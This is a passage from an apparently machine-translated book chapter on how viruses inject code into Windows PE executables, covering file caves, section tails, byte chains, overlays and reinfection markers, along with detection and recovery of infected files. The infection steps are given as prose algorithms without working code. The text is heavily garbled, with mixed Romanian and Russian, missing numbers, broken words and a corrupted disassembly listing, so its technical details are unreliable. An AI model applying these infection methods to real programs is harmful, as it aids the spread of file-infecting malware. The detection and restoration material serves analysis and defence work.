potriviți pentru a -l înregistra/citit (de exemplu, fișierul este blocat de un alt proces), ar trebui sărefuzăm să implementăm □ Dacă fișierul are un atribut care interzice modificarea, eliminați acest atribut, fie refuzațisă implementați □ Dacă Subsistemul> H sau Subsistemul sizeOfLile, atuncifișierul conține cel mai probabil suprapunere și poate fi implementat doar prin metoda A fie egală cu FA, și în acelașitimp virtualul Mărimea nu este egală cu zero, fișierul țintă conține excesiv Atunci când introduceți un astfel defișier, utilizați doar o strategie A Ar trebui să vă amintiți nevoia de a restabili atributele fișierului și timpulcreării, modificării și ultimului acces (majoritatea dezvoltatorilor sunt limitați doar la timpul de modificare, caredecurge Faptul implementării) Dacă câmpul sumei de control nu este egal cu zero, ar trebui să lăsați un astfel de fișierîn repaus, fie să calculați singuri noua sumă de control, de exemplu, apelând la funcția CheckSummApePDFile ARI Pentru areseta suma de control, așa cum fac unii, este inacceptabilă categoric, deoarece cu certificate de securitate activă,sistemul de operare va refuza pur și simplu fișierul de descărcare!Alte câteva considerente ale tipului general Recent,din ce în ce mai des trebuie să ne ocupăm de fișierele executabile ale unui volum monstruos, care se apropie constant demai multe gigabyte A prelucra astfel de monștri în bucăți este obositor și dificil Descărcați întregul fișier înansamblu - prea încet și nu va permite Windows să evidențieze o astfel de cantitate de memorie!Prin urmare, este logicsă utilizați fișierele proiectate în memorie (fișiere mapate în memorie), controlate de funcțiile createfileMapping șiMapViewoffile/nemapViewoff Pe lângă creșterea productivității și simplificarea programării, acest lucru ne permite săeliminăm toate restricțiile la volumul maxim admis, care acum poate ajunge la exabit, ceea ce corespunde octeți) Ca opțiune, dimensiunea fișierelor funcționale este limitată la mai multe megabytecare sunt ușor copiate în bufferul operațional și minimizând numărul de cod „curea” (care a lucrat cu fișiere de la GBși mai sus, va înțelege) Prevenirea reintroducerii „în timp ce alchimiștii medievali au încercat să creeze un alcool -un solvent universal care dizolvă totul și totul - adversarii lor au observat clar: gândiți -vă la ce îl veți păstra?Și,deși Alcogest nu a fost niciodată inventat, ideea lui nu a murit și încă încântă mințile scriitorilor de virus carepoartă ideea unui virus fundamental non -discrete Poate exista un astfel de virus cel puțin în principiu?Și dacă da, cumpoate distinge fișierele deja infectate de încă nu infectate?În caz contrar, același fișier va fi infectat în modrepetat și este puțin probabil ca numeroase copii ale virușilor să se poată adapta pașnic între ele Cod X, Conservarea performanței chiar și cu implementarea multiplă se numește tabel reinfect Reinfectabilitatea face cerințestricte atât pentru algoritmii de implementare în general, cât și pentru strategia de comportament a codului X înspecial Este evident că codul X, care este introdus în MS-DOS-SLASH, nu este reinfectabil și fiecare copie ulterioarăeste întreprinsă de sarcina de a obține alcoolul, care a fost înființat de alchimiști și a fost Nu sunt rezolvateprin sarcini similare pe care oamenii de știință reali s -au angajat într -o știință reală Ca exemplu, se poate citasarcina de a secreta fluor într -o formă pură, soluția căreia mulți oameni de știință au fost foarte scumpi pentruchimiști, ca urmare a experimentelor lor, au primit arsuri grave, otrăvire și chiar au murit A se vedea, de exemplu,articolul „Strokes for Portrets of Famous Chimists” (http://him lseptember ru/articlef php?id= ) GPAV Demontați re-fișiere pe de biți de la sine Protectorii care monopolizează resurselesistemice pentru a se confrunta cu debugitorii (de exemplu, descifrarea/criptarea dinamic a unui program protejat printransferul de pagini de memorie în turnul de veghe cu interceptarea ulterioară a întreruperilor) vor intra în conflictîntre ele, provocând fie înghețarea, fie un eșec al programului Un exemplu clasic de reinfectabilitate este un cod Xcare se prescrie la sfârșitul fișierului și după toate operațiunile planificate care returnează gestionarea programuluide lansare Cu o implementare multiplă, codurile X sunt „nedorite”, transmitând controlul ca și cum ar fi de-a lungulreleului Cu toate acestea, dacă firul de control este confuz, totul se va prăbuși imediat Să presupunem că codul X esteatașat la deplasarea sa fizică, numără-l în ceea ce privește sfârșitul fișierului Apoi, cu implementarea repetată laaceste adrese, vor fi localizate celule complet diferite aparținând codului X al altcuiva, iar comportamentul ambelor vadeveni incert Înainte de a implementa un cod X neinfectabil, trebuie să vă asigurați mai întâi că un alt cod nu a fostintrodus în fișier Din păcate, nu există modalități universale de soluții și trebuie să recurgeți la diverse tehnicieuristice care să recunoască prezența unui cod X străin în conformitate cu semnele indirecte Codurile X înrudite potîntotdeauna „sunt de acord” între ele, remarcând prezența lor cu o semnătură unică De exemplu, dacă fișierul conținelinia Zanzibar cu cod X, atunci refuzăm să introducem pe motiv că există deja „ale noastre” Din păcate, acest truc estefoarte nesigur, iar atunci când se prelucrează un fișier de către orice pachet/bandă, semnătura este inevitabilpierdută Ei bine, poate pentru a introduce semnătura în acea parte a secțiunii de resurse pe care ambalajul/protectoriipreferă să nu o atingă (pictogramă, informații despre fișier etc ) Este și mai fiabil să introduceți semnătura ladata/ora ultimei modificări a fișierului (de exemplu, în câmpul de zecimi de secundă) Pacificul/Protectorii îlrestabilesc de obicei, dar lungimea scurtă a semnăturii provoacă un număr mare de lucrări false, ceea ce nu este deasemenea bun Codurile X care nu sunt trezite sunt mult mai rele Ei nu știu semnăturile altor persoane și, prin urmare,nu pot spune cu siguranță dacă este posibil să implementăm implementarea corectă în fișier sau nu?Prin urmare, codul X,care pretinde a fi corect, trebuie să fie reinfectabil, în caz contrar, menținerea capacității de lucru nu mai estegarantată Packers se găsesc într -o poziție destul de câștigătoare, deoarece un fișier nu este stoarce de două ori, iardacă coeficientul de compresie este mic pe cale de dispariție, pachetul are dreptul de a refuza procesarea unui astfelde fișier Protectorii sunt o altă problemă Puțini de rulare care refuză să proceseze fișierele deja ambalate (criptate)este necesară de puțini Dacă protectorul monopolizează resursele, refuzând să le furnizeze altcuiva, acesta trebuie săcontroleze neapărat integritatea fișierului securizat și, după ce a descoperit introducerea străinilor, afișeazăavertismentul corespunzător pe ecran, eventual oprirea lucrării În caz contrar, un fișier sigur poate împacheta șiîncerca să protejeze din nou Consecințele unei astfel de protecții nu vor fi îndelungate în venirea Clasificareamecanismelor de implementare a implementării poate fi clasificată diferit: la locul implementării (început, sfârșit,mijloc), conform „geopoliticii” (frecarea datelor sursă, Implementarea în spațiu liber, relocarea datelor sursă într -unnou habitat), prin fiabilitate (extrem de corectă, destul de corectă și extrem de incorectă introducere), înreinfectabilitate, etc Ne vom baza și pe natura influenței asupra imaginii fizice și virtuale a programului țintă,împărțirea tuturor mecanismelor existente de implementare în patru categorii, desemnate prin literele latine A, B, C șiZ □ Categoriile A includ mecanisme care nu provoacă modificări în abordarea imaginilor fizice sau virtuale Dupăintroducerea în fișier, nici lungimea sa și nici Cantitatea de memorie alocată la încărcare nu se va schimba și toate structurile de bază vor rămâne la adresele loranterioare Această condiție este satisfăcută cu această condiție: introducerea fișierului fișierului de secțiuni,secțiuni obișnuite, secvențe obișnuite), introducere prin comprimarea unei părți a secțiunii și creând un nou flux MTRZîn fișierul □ Categoria B include mecanisme care provoacă modificări în abordarea doar a unei imagini fizice Dupăintroducerea în fișier, lungimea acestuia crește, cu toate acestea, numărul de memorie este alocat atunci cândîncărcarea nu se schimbă și toate structurile de bază sunt proiectate la aceleași adrese Cu toate acestea, deplasărilelor fizice se schimbă, care necesită o restructurare completă sau parțială a structurilor atașate la adresele lorfizice Dacă cel puțin unul dintre ei rămâne neobservat (sau va fi ajustat incorect), fișierul de transport cu un gradridicat de probabilitate va refuza să funcționeze categoria B corespunde: la alunecare, resetarea unei părți afișierului original în excesiv și Creați -vă propriul excesiv □ Categoria C include mecanisme care provoacă modificăriîn abordarea imaginilor fizice și virtuale Lungimea fișierului și memoria alocată în timpul sarcinii crește Structurilede bază pot rămâne fie în locurile lor (adică, numai deplasările contorizate de la sfârșitul imaginii/fișierului), sause pot deplasa în funcție de pagină, priviți într -un mod arbitrar, necesitând o corecție obligatorie Această categoriecorespunde: extinderea ultimei secțiuni a fișierului, crearea propriei secțiuni și extinderea secțiunilor din mijloc □Categoria Z „clasificată” includ mecanisme care nu sunt deloc atinse în fișierul de transport și sunt introduse înspațiul său de adrese indirect, de exemplu, modificând cheia registrului responsabilă de încărcarea automată abibliotecilor dinamice Această tehnologie este interesată în primul rând de viermii și spionii de rețea Virusii suntindiferenți față de ea Categoria A este cel mai puțin conflict și duce la un refuz doar atunci când fișierul îșicontrolează integritatea Domeniul de aplicare al categoriilor B și C este mult mai limitat În special, mecanismeleaparținând acestor categorii nu pot prelucra fișiere cu informații de depanare, deoarece informațiile de depanare conținaproape întotdeauna un număr mare de legături către adrese absolute Formatul său este scăzut și, în plus, diversecompilatoare folosesc diverse formate de informații de depanare, astfel încât nu este realist să ajustați legăturile lanoile adrese Pe lângă informațiile de depanare, există și certificate de securitate și alte structuri de date care aunevoie de deplasările lor Din păcate, mecanismele de implementare a categoriei A impun restricții destul de stricteasupra volumului maxim admis al codului X, determinat de cantitatea de spațiu liber disponibil în program Destul de des,nu există niciun loc aici chiar și pentru un bootloader minuscul, așa că trebuie să vă asumați un risc forțat săutilizați alte categorii de implementare Apropo, diverse categorii pot fi combinate între ele, realizând o implementare„hibridă” care moștenește cele mai grave calități ale tuturor mecanismelor utilizate, dar, împreună cu aceasta, șiacumulând cele mai bune caracteristici Cu alte cuvinte, alegerea este a ta!Categoria A: Implementarea în spațiul liberal fișierului este cel mai ușor de implementat în spațiul liber al fișierului Până în prezent, sunt cunoscute treiastfel de locuri: trestii, părțile de coadă ale secțiunilor, secvențe regulate Luați în considerare maidetaliat Introducerea unei re-tablet tipice împreună cu MS-DOS cu un antet și o priză ocupă ordinul-zooibite, iarfrecvența minimă a alinierii secțiunilor este de de ore Astfel, între sfârșitul rubricii de la începutul primeisecțiuni există aproape întotdeauna ~ h de octeți fără proprietari, care pot fi utilizate în „scopuri de producție”,plasând aici sau tot ca opțiune, codul X se poate infiltra coada clusterului, care ocupă unul sau mai multe sectoareneocupate (dacă sunt acolo), cu toate acestea, această opțiune nu este luată în considerare aici, deoarece nu are niciolegătură cu re-fișierele Are capitolul Demontare de de biți re -Files a implementat în întregime programul,sau doar un cititor de coduri X, citind continuarea acestuia dintr-un fișier sau un registru de disc (Fig ) Înaintede introducerea codului X, noua sizeofheaders este introdusă spațiu liber al secțiunii de date Code Code Code Code CodeSuprapuneri și secțiuni suplimentare din Fig Introducerea codului X în spațiul liber al cozii re-preluat,introducerea înainte de introducerea în rubrica codului X trebuie să se asigure că coada antetului este cu adevăratliberă, adică sizeofheadres antet: Antet: Public Start Header: Start: Header: Sunațila $+ Продвинprezeтые методы дизассе Hiew в® э отношении более поклади îndeenți, но rva-адреса и переходы внутризагиловка о п т Поэтому, если ы ххотя ыч чуточку не уерены в себе, ползуйтесь дизассе Взззожно, ва§ придетсяреконgant т тчиster ходь, рестности точкtări хода, разрушенные коман dacăЕсли исходный стартовый код начинался п пoролог(а в толшинстве случаев это так), Va fi nevoie de foarte puțin timp pentru a repara fișierul Primii octeți ai prologului sunt standard și ușor deprevizibil, de obicei V EU EU, V EU , V EU EU sau V EU C , iar opțiunea corectă estedeterminată de plcațirea dimensiunii de dimensiunea de dimensiuni Cadrul stivei deviat pentru variabile locale Cu odistrugere mai serioasă, algoritmul de recuperare devine ambiguu și poate fi necesar să sortați un număr mare deopțiuni Încercați să identificați „compilatorul” și studiați codul de pornire furnizat cu acesta-acest lucru simplificăfoarte mult sarcina Mai rău dacă codul X a fost introdus într-un loc arbitrar al programului, după ce a păstratanterior conținutul original în rubrica (care acum nu este la noi) Returnați fișierul deteriorat din inexistență, celmai probabil, va fi imposibil, în orice caz, nu există o rețetă universală pentru resuscitarea sa Un cod X implementatincorect poate șterge gama de importuri de gamă, de obicei localizat în spatele secțiunii secțiunilor, apoi sistemul varefuza fișierul de descărcat Acest lucru se întâmplă atunci când dezvoltatorul determină capătul real al rubriciiconform următoarei formule: e lfanw + sizeofoponalheader + H + numberofsection* , care, Din păcate, este incorect Așa cum am menționat anterior, orice compilator/compoter are dreptul să utilizeze toate dimensiunile Livet deRemoFișierul fișierului este redus la calcularea elementului x al structurii directorului de date și la punct -referințe la structura Image Directory Entry Bound import Dacă tabelul importurilor de gamă conține (mai precisconținute) biblioteci dinamice unice care lipsesc în toate celelalte tabele, atunci pentru a restabili este suficientpentru a cunoaște adresa de bază a încărcării lor Odată cu deconectarea importului, adresele efective ale funcțiilorimportate, redactate în mod rigid în program, se vor referi la paginile nedezvoltate ale memoriei, iar sistemul deoperare va elibera imediat excepția, raportând adresa virtuală a celulei la care Apelul a avut loc Rămâne doar săgăsești biblioteca dinamică (iar această bibliotecă va fi cel mai probabil propria sa bibliotecă a aplicației restaurateinclusă în setul de livrare), care conține un cod mai mult sau mai puțin semnificativ la această adresă, care coincidecu intrarea în funcție Cunoscând numele bibliotecilor importate, puteți restabili cu ușurință tabelul importurilor degamă Pentru decență (astfel încât antivirusurile nu blestemă), puteți șterge un cod X inactiv din fișier prin instalareasizeofheaders pe ultimul octet al tabelelor de secțiune (sau a tabelului importurilor de gamă, dacă este cazul) și pânăla FS r off, umplând restul de octeți cu zero, simbol * sau orice alt simbol pe placul tău Probleme de identificarea compilatorilor au fost luate în considerare din partea /// această carte GPAVA Demontarea re-fișierelor de debiți Implementarea sistemului de operare Windows X în coada secțiunii necesită efortul adreselor fizice alesecțiunilor de cel puțin de ore, iar Windows NT-By H Prin urmare, între secțiuni există aproape întotdeauna oanumită cantitate de spațiu liber în care este ușor să te pierzi Luați în considerare structura fișierului Notepad exedin furnizarea Windows (listarea ) Mărimea fizică a secțiunii Text depășește virtualul pe bboo - cah == hocteți, a RSEC - deja pe COOH!Este suficient să introduceți spațiu pentru implementare, nu -i așa?Desigur, un astfel denoroc nu scade întotdeauna, dar câteva zeci de octeți liberi pot fi găsiți în aproape orice fișier Listarea Astfelarată tabelul secțiunilor de fișiere de nume Notepad exe Text Date RSRC V SIZE CA RVA AR SIZE R OFFST FLAG C C IMPLEMENTARE ÎNAINTE de implementare, aveți nevoieTrebuie avut în vedere faptul că dimensiunea virtuală a secțiunii esteadesea egală cu fizică sau chiar o depășește Acest lucru nu înseamnă că nu există spațiu liber - încercați să scanațipartea de coadă a secțiunii pentru prezența unui lanț continuu de zerouri - dacă unul este cu adevărat prezent acolo (șiunde ar merge?), Poate fi utilizat în siguranță pentru implementare (Fig ) Adevărat, există unul „dar”, din anumitemotive, care nu este luat în considerare de marea majoritate a dezvoltatorilor: dacă dimensiunea virtuală a secțiuniieste mai mică decât fizică, încărcătorul ignoră dimensiunea fizică (deși nu este obligat să facă Aceasta), și poate fioricare, inclusiv, evident, fără sens!Dacă dimensiunea virtuală este zero, bootloader -ul folosește fizicul ca acesta,rotunjindu -l pe dimensiunea alinierii secației Prin urmare, dacă r off + r sz depășește unele secțiuni R OFF Următoarea secțiune, trebuie să refuzați să prelucrați un astfel de fișier, fie să calculați în mod independentdimensiunea fizică pe baza diferenței de compensare brută a două secțiuni vecine Unele programe stochează excesiv înfișier (da, este în interior și nu la sfârșit!), Cu diferența de dimensiune fizică și virtuală, de regulă, există maimult decât multiplicitatea alinierii fizice Este mai bine să nu atingeți o astfel de secțiune, deoarece introducereaunui cod X va duce cel mai probabil la un fișier de fișier Din păcate, un pasaj mai mic copleșitor nu este capabil săprindă acest algoritm, așa că verificați întotdeauna zona implementată pentru zerouri și refuzați să implementați dacăse află altceva aici Majoritatea dezvoltatorilor codului X, care prezintă neglijență prestabilită, neglijează testareaatributelor secțiunii, ceea ce duce la erori critice și alte probleme grave Secțiunea implementată ar trebui să fie, înprimul rând, disponibilă (este instalat Flag Image SCN MEM READ) și, în al doilea rând, neflirat(Image SCN MEM DISCARDABLE FLAG) Este de dorit, dar nu este necesar, cel puțin unul dintre steagurile Image SCN CNT CODEși IMAGE SCN CNT Initialized data a fost cocoșat Dacă aceste condiții nu sunt respectate și nu există alte secțiuniadecvate, este permis să se modifice manual steagurile uneia sau mai multor secțiuni Cu toate acestea, performanțaaplicației țintă în acest caz nu mai este garantată Dacă sunt instalate Flags Image SCN MEM shared șiImage SCN MEM WRITE, oricine și orice poate scrie într -o astfel de secțiune În al doilea rând, adresa descărcării salepoate fi foarte diferită de ѵ A, deoarece aceeași Windows L vă permite să distingeți memoria separată doar în a douajumătate a spațiului de adrese De la introducerea în coada secțiunii, este imposibil să distingem datele inițializate dezerouri de datele incomode, înainte de a transfera codul principal al Pro, Partea IV Metodele avansate de a scăpa degramatică a codului X trebuie să acopere urmele, curățând ușor totul în spatele ei De exemplu, copiați -vă corpul înstivă sau într -un tampon de memorie dinamică și returnați zerouri la locul său Din păcate, mulți uită de acest lucru,ca urmare a căreia unele dintre programe refuză să funcționeze Înainte de introducerea spațiului liber al suprapuneriicu cod X, secțiunea de date ale secțiunii de cod și secțiuni suplimentare din Fig Introducerea codului X în coadasecțiunii, codul rămas de la aliniere, introdus la sfârșitul secțiunii, de obicei supraviețuiește atunci când ambalareasau procesarea fișierului de o bandă de rulare, deoarece zona implementată a memoriei este acum acum marcat la fel deocupat Excepția sunt secțiuni oficiale, cum ar fi o secțiune de elemente mutate sau o secțiune de import, pe carepachetul nu este obligat să o salveze Prin urmare, poate să -i reconstruiască, aruncând toate „inutile” deacolo Algoritmul de implementare generalizat arată aproximativ astfel: □ Citiți re-tabelul □ Analizăm tabelul desecțiune, comparând lungimea fizică a secțiunilor cu virtualul □ Căutăm secțiunile care au r sz> v sz și le scriemcandidaților pentru implementare, după ce ne asigurăm că coada secțiunii conține doar zerouri □ Dacă r sz - v sz> = fa,atunci nu atingem o astfel de secțiune, deoarece cel mai probabil conține excesiv □ Dacă cvorumul nu ar putea fi marcat,căutăm secțiuni care au r sz = Baza de imagine> = h,altfel tabelul elementelor mutate are nevoie cu adevărat de un fișier!În plus, nu toate fișierele cu extinderea EHE suntexecutabile O bibliotecă dinamică se poate ascunde bine sub bibliotecile personale și dinamice fără a se deplasa -nicăieri Apropo, contrar opiniei răspândite, instalarea atributului Image File Relocs Striped nu interzice delocsistemul și pentru deconectarea corectă a tabelului elementelor mutate, este necesar să se reseteze câmpulImage Directory BaseeReloc din structura directorului de date Virusurile de laborator sunt cunoscute, integrând cupricepere X-Code în programul original și folosind activ „materialul de construcție” găsit în corpul fișieruluigazdă Interesul principal este funcțiile de bibliotecă recunoscute de semnătura lor (de exemplu, SPNNTF, RÂND) și, dacănu există nimeni, codul X fie își limitează funcționalitatea, fie le realizează de unul singur Echipele cu o singurămașină, cum ar fi Call EBX sau JMP EAX, intră și în afaceri Sensul acestui truc este că o astfel de amestecare acomenzilor codului X cu comenzile programului principal nu permite antivirusurilor să „smulgă” codul X din fișier Cutoate acestea, această tehnică nu a fost încă adusă în minte și este încă în curs de dezvoltare Introducereaalgoritmului de implementare arată aproximativ așa cum se arată în Fig Pentru implementare, se efectueazăurmătoarele operațiuni: □ Scanați fișierul pentru a căuta secvențe regulate și selectați printre ele lanțurile de ceamai mare lungime În acest caz, cantitatea lor de lungimi ar trebui să depășească ușor dimensiunea codului X, deoarecefiecare lanț reprezintă, în medie , și încă cinci bytes-on Machine Team de tranziție la un alt lanț □ Suntem convinși cănicio parte a lanțului nu face parte din niciunul dintre substructuri, enumerate în directorul de date (și anume substructuri, nu structuri!) Deoarece tabelele exportului/importurilor,resursele, elementele mutate formează ierarhii de arbori pe mai multe niveluri, împrăștiate în mod arbitrar de fișier,limitează-ne la o verificare a imaginii dalectory virtaladress și a imaginii data directory size suficient de categoricinsuficient GPAVA Demontarea re-fișierelor de de biți înainte de implementarea codului X a introdus osecțiune de suprapunere a codului de spațiu liber și codul suplimentar | I 'I X al secțiunii Fig Внедрение Х-кода врегулярные цепочки □ Проверяем атрибуты секции, которой принадлежит цепочка (image scn mem shared,IMAGE SCN MEM DISCARDABLE сброшены, IMAGE SCN MEM READ ИЛИ IMAGE SCN MEM EXECUTE установлены, image scn cnt code илиimage scn cnt initialized data установлены) □ „Tăiați” codul X în felii, adăugând la sfârșitul fiecăruia dintre elecomanda tranziției la începutul următoarei În același timp, nu trebuie să uităm că JMP care corespunde codului mașiniiE, funcționează cu adrese relative, iar acestea sunt chiar adresele care se formează după încărcarea programului înmemorie Cu deplasările „brute” din fișier, au dreptul să nu coincidă Cum se calculează corect adresa relativă atranziției?Determinăm deplasarea echipei de tranziție din principiul fizic al secțiunii, adăugăm cinci octeți la ea(lungimea comenzii împreună cu operandul) Punem valoarea rezultată în adresa virtuală a secțiunii și punem rezultatul învariabila AI Apoi determinăm deplasarea următorului lanț, numărat de la începutul secțiunii din care aparține și opliază cu o adresă virtuală, notând rezultatul într -o variabilă A Diferența A și AI este operandul instrucțiunilorJMP □ Ne amintim de adresele, lungimile inițiale și conținutul inițial al tuturor lanțurilor într -un depozit improvizatconstruit fie în interiorul releului, fie în interiorul uneia dintre lanțuri Dacă acest lucru nu se face, atunci codul Xnu va putea extrage corpul dvs din fișierul purtător pentru introducerea tuturor celor ulterioare Unii dezvoltatori înlocul echipei JMP folosesc apel, care aruncă adresa de retur în stivă în partea de sus Deoarece este ușor de descoperit,totalitatea adreselor de întoarcere este localizarea „cozilor” tuturor lanțurilor utilizate, iar adresele „capetelor”sunt stocate în operandul echipei de apeluri!Extragem următoarea adresă de întoarcere, o reducem cu patru - și adresa depornire relativă a următorului lanț din fața noastră!Identificarea obiectelor afectate, implementarea într -o secvențăregulată este destul de ușor recunoscută de lanțul lung de JMP sau de instrucțiuni de apel, care se întinde prin una saumai multe secțiuni ale fișierului și deseori localizate în locuri care sunt complet de neînțeles, de exemplu, dateSecțiuni (listarea ) Dacă codul X este introdus în pictogramă, acesta va suferi distorsiuni caracteristice (Fig ) Mai rău, dacă un lanț obișnuit situat în secțiunea de cod conține întregul cod X în întregime-atunci pentru aidentifica codul implementat, trebuie să recurgeți la dizassembing-ul său și la alte trucuri viclene Din fericire,astfel de lanțuri obișnuite în natura vie nu sunt practic găsite Partea IV Metodeavansate DizassMittering Jö ” A : S PushHFD A : PushAd - A A: E V MOVFS: [ ], ESP A : E ° PALL A -( ) - A : D POPP A -( ) A : EVOI JMPS A - -( ) A : VS MOV EAX, EBP A : E S JMPS A -( ) - A : EV E JMPS A F : EV EJMPS A - - ( ) A : EVZEJMPS • A - - ( ) A : EB D JMPS A D - - ( ) A D : EB DJMPS A E - ( ) A E : D Sub eax, • A A: E [ETHE] : Push EAX A F : Adăugați EAX, ► • A F : E MOV [EBP] [ E], EAX A FC: PUSH EAX A FD, ADD EST EST A : E JMPS A ( ) Fig Introducerea codului X în pictograma principală a fișierului Capitolul Demontați re-fișiere pe de biți Restaurarea obiectelor afectate pentrua rupe codul X, care a fost strâns contopit cu acesta, este aproape imposibil Distingeți fragmentele codului X defragmentele fișierului original Da, și este necesar?La urma urmei, este suficient să preiați controlul de la el Dinfericire, astfel de coduri X sofisticate în „Natura sălbatică” nu sunt găsite niciodată și, de obicei, limiteazăintroducerea în secvențe gratuite (din punctul lor de vedere), regulate, care poate aparține bine tampoanelor de dateinițializate Dacă codul X înainte de transferul programului original nu le curăță, comportamentul ei riscă să devinăcomplet imprevizibile (se aștepta să vadă zero în variabila inițializată și ce i-a fost alunecat?) Restaurareapictogramelor și a bitmap -ului nu este o mare problemă Acesta este realizat prin editarea banală a resurselor în oriceeditor decent de resurse (de exemplu, în Visual Studio) Sarcina este foarte simplificată de faptul că toate pictogramelesunt de obicei stocate în mai multe exemplare realizate cu diverse palete de culori și rezoluție În plus, din toatesecvențele obișnuite, programatorii sunt de obicei aleși pentru introducerea zerourilor corespunzătoare culoriitransparente în pictograme și negru în bitmap Imaginea în sine rămâne intactă, dar înconjurată de „gunoi”, care seîndepărtează cu ușurință cu o ștergătoare Dacă, după eliminarea codului X, fișierul refuză să înceapă, trebuie doar săschimbați editorul de resurse sau să folosiți Hiew, cu abilități minime pentru a lucra cu care pictogramele pot fieditate în IH-Removim' Un caz separat reprezintă restaurarea tabelului elementelor mutate, distrusă ireversibil decodul X introdus Dacă baza de imagine = imagine basy și y sizeOfLile, atunci fișierul conține cel mai probabil suprapuneri și este maibine să refuzați implementarea P, Dacă dimensiunea fizică a unei secțiuni depășește virtualul printr -o valoare careeste mare sau egală cu alinierea fișierului, atunci fișierul conține cel mai probabil suprapunerile de mijloc și esterecomandat cu tărie ca implementarea să fie refuzată P Selectați o secțiune potrivită pentru implementare(image scn mem shared, Image SCN MEM DISCARDABLE DREPT De regulă, aceasta va fi prima secțiune a fișierului PAmestecarea fizică a începutului secțiunii din fișier este egală cu compensarea sa brută (acesta este un câmp fiabil șiîl puteți crede) P Amestecul fizic al sfârșitului secțiunii din fișier este calculat într -un mod mai complex: min(CS RAW OFFSET + ALIGN DOWN (CS R SZ, FA), NS RAW OFF) P, găsim o parte din secțiunea care nu conține substructuriletabelelor de service ale re-fișierului, cum ar fi, de exemplu, tabele de import/export Secțiunea de titlu Secțiunea dedate Cod și secțiuni suplimentare ale codului X Fig Introducerea codului X în fișier prin aruncarea unei părți asecțiunii în supraalimentarea GPAV Demontare de re-fișiere pe de biți □ În partea selectată (părți) a secțiunii găsim unasau mai multe regiuni gratuite din elementele mutate și dacă este Este imposibil, atunci „mușcă” aceste elemente din tabelul de fixare pentru procesarea ulterioară de către codul Xmanual □ Dacă doriți, găsim primul prolog și ultimul epilog în interiorul părților selectate ale secțiunii, astfel încâtlinia „tăiată” să nu rupă funcția la jumătate (acest lucru nu va încălca performanța fișierului, ci va face ca faptul căImplementarea este mai vizibilă) □ Dacă dorim să creăm suprapuneri în fișier, atunci: • Creștem compensarea brută atuturor secțiunilor ulterioare prin valoarea align up (sizeof (X-code), FA) • Fizic, mutăm toate secțiunile ulterioaredin fișier pentru aceeași valoare • Mutăm părțile selectate ale secțiunilor în exces, înregistrându -le într -un formatarbitrar, dar astfel încât ei înșiși să -și dea seama □ altfel: • Conduceți părțile selectate ale secțiunii la sfârșitulfișierului, scriind -le într -un format arbitrar, dar astfel încât ei înșiși să -și dea seama □ Scriem codul X pentrulocul vacant Identificarea obiectelor afectate Dizassemping of astfel de fișiere nu dezvăluie nimic neobișnuit Codul Xeste localizat în secțiunea de cod, unde se presupune că este orice cod normal Nu se observă de asemenea gunoisuspect Adevărat, se găsesc un număr de referințe încrucișate care duc la mijlocul funcțiilor, iar aceste funcții, așacum este ușor de ghicit, aparțin codului X La urma urmei, chiar dacă codul X și taie fragmentele tăiate de secțiuni de-alungul limitelor funcțiilor, deplasarea funcțiilor codului X în interiorul fiecăruia dintre fragmente va diferi de celeoriginale Nu se presupune că va reduce fiecare funcție - aceasta este o activitate prea laborioasă Cu toate acestea,acest lucru se întâmplă adesea cu fișiere evident neîngrijite, astfel încât nu există motive de suspiciune la primavedere Prezența mijlociu este ușor recunoscută de inconsecvența adreselor fizice și virtuale, care nu este observată înaproape niciun fișier normal, dar prezența unui excesiv la sfârșitul fișierului este normală Nu există nicio altămodalitate de a analiza întregul cod X în întregime și, dacă sunt detectate manipulări cu restabilirea secțiunii, atunciva fi expusă faptul de implementare Codul X își dă apelul funcțiilor VirtualProtect (atribuirea unui atribut alînregistrării), getCommandline, getModuleBaseEname, getModulefullName sau getModulefullNamex (determinarea numeluifișierului de purtător) Asigurați-vă că secțiunea de cod este disponibilă doar pentru citire, altfel șansele prezențeiunui cod X vor crește semnificativ (și nu va mai fi nevoie să provoace VirtualProtect) Restaurarea obiectelor afectatetrebuie de obicei să se confrunte cu două erori algoritmice făcute de dezvoltatorii codului implementat: o verificareincorectă a intersecției părții descărcate a secțiunii cu date oficiale și implementarea în secțiune cu atributeimproprii Ambele erori sunt complet reversibile Erorile de determinare a lungimii secțiunii descărcate sunt mai puținfrecvente: dacă CS V SZ NS RAW OFF, atunci încărcătorul de sistem încarcă doar CS V SZprin secțiunea secțiunii , iar codul implementat renunță la octetul CS R SZ al secțiunii, captând o bucată din secțiuneaurmătoare, excluzând că poate fi proiectată la alte adrese, ca urmare, la restaurarea conținutului original al secțiuniidescărcate, O bucată din secțiunea următoare nu va fi restaurată Mai rău, codul X se va dovedi a fi rupt cu douăsecțiuni în jumătate, iar aceste jumătăți pot fi la fel de departe unul de celălalt!Desigur, el nu va putea lucra dupăaceea Partea IV Metode avansate DizAssmit Dacă fișierul afectat începe normal, doar un pic de agitare pentru așterge codul X și, după ce a așteptat momentul în care este transferat gestionarea programului principal, eliminațihaldele Categoria B: Crearea suprapusă excesivă poate stoca nu numai conținutul original al secțiunii, ci și codulX!Adevărat, nu va fi posibil să scoateți complet întregul cod X în suprapuneri-orice ar putea spune, dar cel puțin unbootloader minuscul va mai trebui să fie introdus în corpul principal, plasându-l în antet, să străpungeți coada , într-o secvență obișnuită sau în alte părți libere ale fișierului Avantajele acestui mecanism constau în simplitateaimplementării, fiabilității, non -conflict, etc Acum nu mai este necesară analizarea substructurilor oficiale pentruintersecția lor cu partea de descărcare de gestiune a secțiunii (nu renunțăm la nimic!), Prin urmare, dacă se vaîntâmpla că suprapunerile vor muri, bootloader -ul va transfera pur și simplu gestionarea programului principal fără a-i încălca performanța Overli trebuie plasat fie la sfârșitul fișierului, fie la rubrica sa Deși acest lucru va fi maivizibil, șansele de a supraviețui atunci când ambalajul vor crește semnificativ Introducerea algoritmului deimplementare este complet identică cu „categoria în descărcarea unei părți a secțiunii în suprapuneri” descrise însecțiunea precedentă, doar excepția că suprapunerea nu este aruncată de partea fișierului de transport, ci direct CodulX în sine, procesat în sine, procesat Bootloader special Implementarea bootloader -ului este de obicei efectuată în categoria A (a se vedea secțiunea„Categoria A Introducere în spațiul liber al fișierului”), deși, în principiu, pot fi utilizate altecategorii Identificarea implementării afectate a acestui tip de implementare de acest tip este ușor recunoscută vizualprin prezența unui bootloader, de regulă, introdus de categoria A și de prezența suprapuse la începutul, sfârșitul saumijlocul fișierului Restaurarea obiectelor afectate Dacă codul X este proiectat corect, este suficient pentru adistruge suprapunerile pentru a-l elimina (de exemplu, prin ambalarea programului Aspack cu o opțiune de deschiderepentru conservarea suprapunerilor) Metoda de eliminare a 